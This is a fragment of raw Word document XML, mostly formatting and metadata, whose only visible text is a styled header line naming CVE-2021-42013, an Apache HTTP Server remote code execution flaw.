        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  CVE</w:t>
    </w:r>
    <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>-</w:t>
    </w:r>
    <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>2021</w:t>
    </w:r>
    <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>-</w:t>
    </w:r>
    <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">42013 Apache HTTP Server </w:t>
    </w:r>
    <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>RCE</w:t>
    </w:r>
    <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="C0392B"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  |</w:t>
    </w:r>
    <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="C0392B"/>
        <w:sz w:val="17"/>
        <w:szCs w:val="17"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">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f628c2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c8bdb3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1f925445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3434D9F"/>
  <w15:docId w15:val="{AEE13CF3-88E5-4B32-9812-0A6FD7229BB3}"/>
  <w:rsids>
    <w:rsidRoot w:val="10F828C0"/>
    <w:rsid w:val="10F828C0"/>
    <w:rsid w:val="1B460911"/>
    <w:rsid w:val="2872A397"/>
    <w:rsid w:val="2ED1744F"/>
    <w:rsid w:val="34CA7DCF"/>
    <w:rsid w:val="3CFFFFC7"/>
    <w:rsid w:val="416AE91D"/>
    <w:rsid w:val="41A8F5C2"/>
    <w:rsid w:val="41FC9987"/>
    <w:rsid w:val="602650C0"/>
    <w:rsid w:val="602650C0"/>
    <w:rsid w:val="6745571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140"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1B3A6B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300" w:after="80"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1B3A6B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/media/image.png" Id="rId191245822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 DRI</lastModifiedBy>
  <revision>2</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-09T01:21:21.6600000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-09T03:23:54.0852318Z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